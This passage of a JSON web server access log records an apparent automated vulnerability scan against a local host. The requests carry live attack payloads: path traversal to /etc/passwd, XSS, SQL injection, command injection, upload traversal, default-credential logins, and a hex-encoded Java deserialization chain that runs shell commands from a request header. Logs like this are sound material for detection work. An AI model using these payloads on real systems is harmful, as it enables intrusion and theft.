/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.280","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /api/jsonws/invoke HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.279","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.807","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /RASHTML5Gateway/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.311","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /clientaccesspolicy.xml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.311","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /download.php?file=/etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.364","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /iNotes/Forms85.nsf HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.368","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.372","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /nagios/side.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.330","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /CgiStart?page=Single HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.338","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html?saml2=disabled HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.326","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(202072102)))),@`%27` HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.309","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.309","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id; HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.854","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.. HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.273","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.309","http_user_agent":"Nacos-Server", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /_notes/dwsync.xml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.363","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.379","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?q=file:///etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.318","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.322","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%27%2Balert%281%29%2B%27x HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.454","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /lucees3ezf%3cimg%20src%3da%20onerror%3dalert('28fHqOmFFQcPQyDUWSDS4bgQtgQ')%3elujb7/admin/imgProcess.cfm HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.395","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx?dp=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.244","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999))) HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.378","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/users/search_authors HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.364","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /console/login/LoginForm.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.368","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?author=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.340","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cgi-bin/luci HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.410","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.433","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.362","http_user_agent":"Nacos-Server", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.266","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"------WebKitFormBoundaryoZ8meKnrrso89R6Y\x0D\x0AContent-Disposition: form-data; name=\x22jarfile\x22; filename=\x22../../../../../../../tmp/poc\x22\x0D\x0A\x0D\x0Atest-poc\x0D\x0A------WebKitFormBoundaryoZ8meKnrrso89R6Y--\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /jars/upload HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.324","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:23 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /graph HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.447","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:23 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx?dp=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.253","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:23 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.432","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:23 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('28fHqOmFFQcPQyDUWSDS4bgQtgQ')%3elujb7/admin/imgProcess.cfm HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.296","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:23 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /druid/login.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.275","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:23 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.271","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:23 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.240","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:23 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.379","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1/admin/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:23 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /glpi/files/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.341","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:23 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.392","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:23 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/tmm_db_migrate/tmm_db_migrate.zip HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.361","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:23 +0000","request_body":"USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /account/index.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.382","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:23 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /iNotes/Forms9.nsf HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.962","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:23 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.283","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:23 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.269","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:23 +0000","request_body":"username=guacadmin&password=guacadmin","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /api/tokens HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.269","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:23 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.316","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:23 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /vendor/phpfastcache/phpfastcache/examples/phpinfo.php 